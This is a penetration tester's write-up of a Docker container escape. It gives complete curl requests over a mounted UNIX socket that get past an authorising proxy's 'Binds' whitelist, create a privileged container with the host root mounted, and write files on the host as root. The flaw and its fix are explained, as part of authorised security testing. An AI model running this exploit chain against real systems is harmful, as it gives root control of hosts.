A Tale of Escaping a Hardened Docker Container

Legend has it that, before his death, Harry Houdini said: “If it is truly possible for someone to return from the afterlife, I will”. Although he was a great illusionist and escape artist, this last feat seems to have proved too hard even for him. Escaping from a container is much simpler. A docker container, of course 🙂 … our topic for today.

The danger of exposing “docker.sock” to a docker container is well known, and the security literature is full of examples (one is here) leading to container escape and privilege escalation on the host machine. Sometimes, however, exposing it is required for legitimate purposes, such as creating other containers or pushing configuration settings. While the docker security guidelines advise against sharing the Docker UNIX socket inside a container, the project developers give no advice on how to secure such a configuration when it is needed for “good reasons”. That is why so many companies that adopt docker and deliver services based on it still suffer from this problem today.

For example, last year one of our customers hired a security firm to check the robustness of their docker infrastructure. One of the main findings was the file “docker.sock” being mounted within some of their containers, which of course was a sufficient condition to compromise the entire host operating system. In the absence of a strong solution coming from the community, our customer decided to build its own. They created a reverse proxy in front of the Docker UNIX socket file that would add authentication and authorization, and would prevent insecure use of the Docker socket itself.

Then they asked us to test the new architecture. This is the story of how the sympathetic Red Timmy managed to bypass it.

The architecture

Before moving forward, we must briefly explain the implementation we were called to test. A picture should make the job easy enough.

In this architecture there are now two UNIX socket files:

  • /var/run/docker.sock is no longer exposed within the docker containers. It is readable and writable only by the “root” user and the “docker” group. As you already know, the docker engine uses it directly.
  • /var/run/somethingelse.sock is instead the resource exposed within the docker containers. The file is created so that it is readable and writable only by an unprivileged user who is not part of the docker group. In this way the process creating it does not have sufficient access rights to read from and write to “/var/run/docker.sock” directly. The docker engine remains the only one able to do that.

Then a reverse proxy, running as a privileged user, sits in the middle of these two UNIX socket files. It fetches requests from “/var/run/somethingelse.sock” and determines whether or not they must be forwarded to “/var/run/docker.sock”, based on a whitelist of authorized values previously saved in a configuration file. For example, a request is let through only if it matches a specific HTTP method (GET, POST, etc…), path (for example “/containers/create”) and/or JSON body.

In the same way, the reverse proxy returns the replies from “docker.sock” to “somethingelse.sock” once they are in the pipeline. At first glance the workflow looked fine and flawless.
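To make the filtering idea concrete, here is a minimal Python sketch of a method-and-path whitelist. We never saw the proxy's source or its configuration file, so the `Rule` type, the `WHITELIST` entries and the `is_forwarded` function are all assumptions made for illustration only.

```python
import re
from typing import NamedTuple


class Rule(NamedTuple):
    method: str        # HTTP method the rule applies to
    path_pattern: str  # regular expression the full request path must match


# Hypothetical entries: the customer's real configuration file is not reproduced here.
WHITELIST = [
    Rule("POST", r"/containers/create"),
    Rule("POST", r"/containers/[0-9a-f]+/start"),
]


def is_forwarded(method: str, path: str) -> bool:
    """Return True if the request may be passed on to /var/run/docker.sock."""
    return any(
        rule.method == method.upper() and re.fullmatch(rule.path_pattern, path)
        for rule in WHITELIST
    )
```

With these made-up rules, a POST to “/containers/create” would be forwarded, while any request that matches no rule would be answered with a 403 by the proxy itself. A real implementation would also have to inspect the JSON body, which is where things get interesting later on.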

Let the dance begin

Ok, all clear. We have been provided with access to a docker container:

[root@dockerhost ~]# docker exec -it 7c4e2742becb bash
bash-4.4$     <-- container command prompt

Also our handsome UNIX socket file is where it is supposed to be:

bash-4.4$ ls -al /var/run/somethingelse.sock
srw------- 1 unpriv root 0 Feb 13 11:31 somethingelse.sock

Now we must find a way to escape out of there. The first thing we try is the “old” trick documented in the report that our customer received from the security firm they had originally hired:

bash-4.4$ curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true, "AttachStdout": true, "AttachStderr": true, "Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos"], "Privileged": true}}' http://localhost/containers/create

The main difference in our command is that instead of establishing a communication channel with “/var/run/docker.sock” (not mounted in the container) we target “/var/run/somethingelse.sock” (which is instead mounted in the container). All the hacking steps are performed with curl. Specifically, as we are communicating with a UNIX domain socket, the “--unix-socket <filename>” option is adopted.
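For readers who prefer a script to curl, the same kind of request can be sketched in Python using only the standard library. This is not what we used during the test: `UnixHTTPConnection` and `send_request` are our own illustrative names, and the sketch simply swaps the TCP connection of `http.client.HTTPConnection` for a UNIX domain socket.

```python
import http.client
import socket
from typing import Optional, Tuple


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection that talks to a UNIX domain socket instead of TCP."""

    def __init__(self, socket_path: str, timeout: float = 10.0):
        # The host is only used for the Host header; "localhost" mirrors the curl URL.
        super().__init__("localhost", timeout=timeout)
        self.socket_path = socket_path

    def connect(self) -> None:
        # Replace the default TCP connection with an AF_UNIX stream socket.
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.settimeout(self.timeout)
        sock.connect(self.socket_path)
        self.sock = sock


def send_request(socket_path: str, method: str, path: str,
                 body: Optional[str] = None) -> Tuple[int, bytes]:
    """Send one HTTP request over the socket and return (status, response body)."""
    conn = UnixHTTPConnection(socket_path)
    headers = {"Content-Type": "application/json"} if body is not None else {}
    try:
        conn.request(method, path, body=body, headers=headers)
        response = conn.getresponse()
        return response.status, response.read()
    finally:
        conn.close()
```

A call such as `send_request("/var/run/somethingelse.sock", "POST", "/containers/create", body)` would then play the role of the curl command above, with `body` holding the JSON document.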

The command above is the same (slightly extended) as the one given in the section “Create the container with the mounted volume” of this online tutorial, which the penetration tester had linked in his report. I strongly suggest reading that post before going ahead with this one if you are not familiar with the technique in general. In any case, a short explanation of what we were trying to do with that command follows.

Basically, from inside the container we are in, we are trying to create another container that, once started, will have the root directory “/” of the host operating system mounted under its “/hostos/” folder. If that can be done, it is game over. Just connecting to the new container and launching the command “chroot /hostos” would provide the attacker with full access to the host operating system and all its files.
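The structure of that request body is easier to read when it is built programmatically. The sketch below, with the hypothetical helper name `build_create_body`, keeps only the fields that matter for the escape; the image name is the redacted one from the curl command.

```python
import json
from typing import List


def build_create_body(image: str, binds: List[str]) -> str:
    """Serialize a /containers/create request body like the one sent with curl."""
    body = {
        "Image": image,
        "Entrypoint": "/bin/bash",
        "Tty": True,
        "OpenStdin": True,
        # Mount point declared inside the new container.
        "Volumes": {"/hostos/": {}},
        "HostConfig": {
            # Each entry has the form "host_path:container_path".
            "Binds": binds,
            "Privileged": True,
        },
    }
    return json.dumps(body)


payload = build_create_body(
    "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT", ["/:/hostos"]
)
```

The dangerous part is the single “Binds” entry: the left-hand side is the host path “/” and the right-hand side is where it appears inside the new container.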

In our case, however, the reverse proxy replied with:

HTTP/1.1 403 Forbidden

Honestly it was expected. Something else had to be attempted.

Time for circumvention

After a bit of trial and error we understood that the strictest check is performed on the value passed to “Binds”. When we provide the string “/:/hostos”, trying to map the filesystem “/” of the host into the “/hostos” directory of the container, the request is rejected because the specified string is not in the whitelist. However, we discovered that “/dev/log:/dev/log”, for example, is an accepted value. It means the reverse proxy allows us to create a container from inside another container when that value is provided. Of course there is nothing special about using “/dev/log” to bypass the filter. But what if the strings “/:/hostos” and “/dev/log:/dev/log” are both specified as part of the same “Binds” parameter, like below?

bash-4.4$ curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"], "Privileged": true}}' http://localhost/containers/create

Unexpectedly, the reverse proxy replies with:

HTTP/1.1 201 Created
Api-Version: 1.39
Content-Length: 90
Content-Type: application/json
Date: Fri, 15 May 2020 08:19:58 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)

{"Id":"4fa6bfc84930[...]","Warnings":null}

So it means we are allowed to create a new container where the root of the host filesystem is mounted into its “/hostos” directory. To confirm that, we manually started the newly created container from the host OS and then accessed it. This was what we got…

[root@4fa6bfc84930 opt]# ls -al /hostos/
[...]
drwxr-xr-x. 102 root root 8192 May 6 09:08 etc
drwxr-xr-x. 6 root root 56 Feb 7 2018 home
drwxr-xr-x. 2 root root 6 Mar 10 2016 media
drwxr-xr-x. 2 root root 6 Mar 10 2016 mnt
drwxr-xr-x. 17 root root 4096 Mar 24 2017 nfs
drwxr-xr-x. 7 root root 106 Jan 7 2019 opt
dr-xr-xr-x. 375 root root 0 Nov 23 08:23 proc
dr-xr-x---. 8 root root 4096 May 14 13:51 root
drwxr-xr-x. 35 root root 1140 May 6 09:08 run
lrwxrwxrwx. 1 root root 8 Jan 18 2018 sbin -> usr/sbin
[...]

…meaning that from inside the container we have total control over the entire host OS filesystem, which is exactly what the reverse proxy implementation was attempting to prevent. Good, but how was that possible? Well, let’s have one more look at the relevant part that made the trick possible:

"Binds": ["/:/hostos", "/dev/log:/dev/log"]

It seems that if just one of the strings given to the “Binds” parameter is present in the whitelist, the whole check is considered passed, regardless of the presence of other values that are not defined in the whitelist configuration. The logic of the reverse proxy was clearly flawed.
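We did not have the proxy's source code in front of us, so what follows is only our guess at the kind of logic that would produce this behaviour, next to the check one would expect. `ALLOWED_BINDS`, `flawed_check` and `strict_check` are hypothetical names, and the whitelist content is limited to the one value we observed being accepted.

```python
from typing import List

# Hypothetical whitelist content: the only accepted value we observed.
ALLOWED_BINDS = {"/dev/log:/dev/log"}


def flawed_check(binds: List[str]) -> bool:
    """Pass as soon as ONE requested bind is whitelisted (the behaviour we observed)."""
    return any(bind in ALLOWED_BINDS for bind in binds)


def strict_check(binds: List[str]) -> bool:
    """Pass only if EVERY requested bind is whitelisted."""
    return all(bind in ALLOWED_BINDS for bind in binds)


request_binds = ["/:/hostos", "/dev/log:/dev/log"]
print(flawed_check(request_binds))  # True: the request is forwarded
print(strict_check(request_binds))  # False: the request would be rejected
```

The difference between the two functions is a single word, “any” versus “all”, which is about the size of the mistake needed to turn an allow-list into a formality.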

Start the container just created

So from inside the current container we have managed to create a new one with full access to the host OS filesystem. But we have not executed anything in the host OS yet…and we are still confined within our unprivileged container.

bash-4.4$

Let’s try to get out of here. First of all let’s see if after its creation we can also start the container from the place where we are now:

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' http://localhost/containers/4fa6bfc84930[...]/start

As indicated in the Docker API documentation, the endpoint to target this time is “/containers/{ID}/start”, where ID is the value the reverse proxy returned to us in reply to the previous request. The reply we get is:

HTTP/1.1 204 No Content
Api-Version: 1.39
Date: Fri, 15 May 2020 08:20:34 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)

It means we are allowed to do that. So far, so good. Now the highly privileged container is started and we want to execute a command in it. We could, for example, create an exec instance and then start it to get the result back. Unfortunately the reverse proxy did not let us through, because the endpoint “/containers/{id}/exec” is not in the whitelist:

HTTP/1.1 403 Forbidden

Ok, what if we use the docker API to attach to the privileged container we created, so that we can send it input and read its output directly from the unprivileged one where we are confined now?

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST "http://localhost/containers/4fa6bfc84930/attach?logs=1&stream=1&stdin=true&stdout=true&stderr=true"

In this case the reply is encouraging…

HTTP/1.1 200 OK
Content-Type: application/vnd.docker.raw-stream
Date: Thu, 14 May 2020 16:05:09 GMT
Transfer-Encoding: chunked

…but for some reason we are returned to the shell of our unprivileged container:

bash-4.4$

Probably the reverse proxy does not handle this kind of request well, even though it is not explicitly prohibited in the whitelist configuration file. We clearly cannot abuse this mechanism.

Searching for something else

What other options are we left with in order to execute a command in the started container? Unfortunately not many, and everything we tried was blocked or did not work. Let’s analyze what we are allowed to do so far. Our best achievement is the ability to bypass the reverse proxy’s whitelist and create a container. We then decided to take a closer look at the Docker API and stumbled upon the “Cmd” parameter of the “/containers/create” endpoint.

This looks like a command run when the container is started. We decided to give it a try by creating a new container specifying that parameter:

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint":"","Cmd": "touch /hostos/root/marco_RT_was_here.txt","Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"], "Privileged": true}}' http://localhost/containers/create

Compared to the previously launched command:

  • “Entrypoint” is now empty as we don’t need it.
  • “Cmd” is set to the command we want to execute in the host OS, that is “touch /hostos/root/marco_RT_was_here.txt”.
  • “Binds” is configured the same way as in the previous request, in order to mount the root of the host OS into the “/hostos” directory of the newly created container.

As “/hostos” contains the full host filesystem thanks to the whitelist bypass of the “Binds” parameter seen before, the assumption is that, once the container is started, this request will actually create the file named “marco_RT_was_here.txt” in the “/root” folder of the host with the permissions of the root user.

After submitting our request, the reverse proxy replies with the ID of the new container (abac34acc1003[...]). Time to start it:

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' http://localhost/containers/abac34acc1003[...]/start

We expected to see the file “marco_RT_was_here.txt” created inside the “/root” folder of the host OS, but we were wrong: no file appeared. However, a quick look at the description of the “Cmd” parameter was sufficient to reveal that the command must be passed as an “Array of string”. This means our payload has to be shaped like this:

["touch", "/hostos/root/marco_RT_was_here.txt"]

…and not as a single static string “touch /hostos/root/marco_RT_was_here.txt”. Ok, let’s send the request again:

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true, "Tty": true,"OpenStdin": true, "StdinOnce": true,"Entrypoint": "","Cmd": ["touch", "/hostos/root/marco_RT_was_here.txt"],"Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"], "Privileged": true}}' http://localhost/containers/create
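As a side note, the conversion from a shell-style command line to the array form can be sketched in Python with `shlex.split` from the standard library. The helper name `to_cmd_array` is ours and is not part of any Docker tooling.

```python
import json
import shlex
from typing import List


def to_cmd_array(command_line: str) -> List[str]:
    """Split a shell-style command line into the argv-style list used for "Cmd"."""
    return shlex.split(command_line)


cmd = to_cmd_array("touch /hostos/root/marco_RT_was_here.txt")
# Fragment of the request body carrying the two fields discussed above.
fragment = json.dumps({"Entrypoint": "", "Cmd": cmd})
print(fragment)
```

Using `shlex.split` rather than a plain `str.split` keeps quoted arguments containing spaces together as one element, which matters as soon as the command gets more elaborate than a “touch”.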

The ID the reverse proxy returns is 21429c9550c5c. Then, with that ID in our hands, the container is started for the umpteenth time…

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' http://localhost/containers/21429c9550c5c[...]/start

…and now things seem to work, as shown below:

# ls -al /root/
[...]
-rw-r--r-- 1 root root 0 May 15 10:20 marco_RT_was_here.txt
[...]

This incontrovertibly demonstrates that the filesystem of the host machine is fully accessible from the container we are confined in, and that we can write files on the host OS as root. This can then be taken further in ways limited only by our imagination. On the host OS we could, for example, write a cron job, launch a reverse shell, deploy a malicious privileged docker image with the ssh port exposed, etc…

Wonderful! This concludes our post.